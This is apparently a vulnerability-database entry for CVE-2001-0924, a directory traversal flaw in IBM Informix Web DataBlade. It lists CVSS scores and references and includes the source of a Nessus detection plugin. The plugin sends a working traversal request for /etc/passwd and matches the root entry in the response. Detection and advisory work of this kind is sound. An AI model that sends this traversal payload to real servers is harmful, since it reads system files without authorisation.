Vulnerabilities > CVE-2001-0924 - Directory Traversal vulnerability in IBM Informix Web Datablade

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
ibm
nessus
exploit available

Summary

Directory traversal vulnerability in ifx CGI program in Informix Web DataBlade allows remote attackers to read arbitrary files via a .. (dot dot) in the LO parameter.

Exploit-Db

descriptionIBM Informix Web Datablade 3.x/4.1 Directory Traversal Vulnerability. CVE-2001-0924 . Remote exploits for multiple platform
idEDB-ID:21160
last seen2016-02-02
modified2001-11-22
published2001-11-22
reporterBeck Mr.R
sourcehttps://www.exploit-db.com/download/21160/
titleibm informix Web datablade 3.x/4.1 - Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idINFORMIX_TRAVERSAL.NASL
descriptionThe Web DataBlade modules for Informix SQL allows an attacker to read arbitrary files on the remote system by sending a specially crafted request using
last seen2020-06-01
modified2020-06-02
plugin id10805
published2001-11-25
reporterThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10805
titleInformix SQL Web DataBlade Module Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10805);
 script_version ("1.27");

 script_cve_id("CVE-2001-0924");
 script_bugtraq_id(3575);
 
 script_name(english:"Informix SQL Web DataBlade Module Traversal Arbitrary File Access");
 script_summary(english:"/ifx/?LO=../../../file");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting an application that is affected by a
directory traversal vulnerability." );
 script_set_attribute(attribute:"description", value:
"The Web DataBlade modules for Informix SQL allows an attacker to read
arbitrary files on the remote system by sending a specially crafted
request using '../' characters." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Nov/199" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Informix SQL Web DataBlade Module 4.13 or later, as this
reportedly fixes the issue." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2001/11/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/11/21");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);


if(get_port_state(port))
{
  res = http_send_recv3(method:"GET", item:"/ifx/?LO=../../../../../etc/passwd", port:port);
  if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");

  if (egrep(pattern:"root:.*0:[01]:.*", string:res[2])) security_warning(port);
}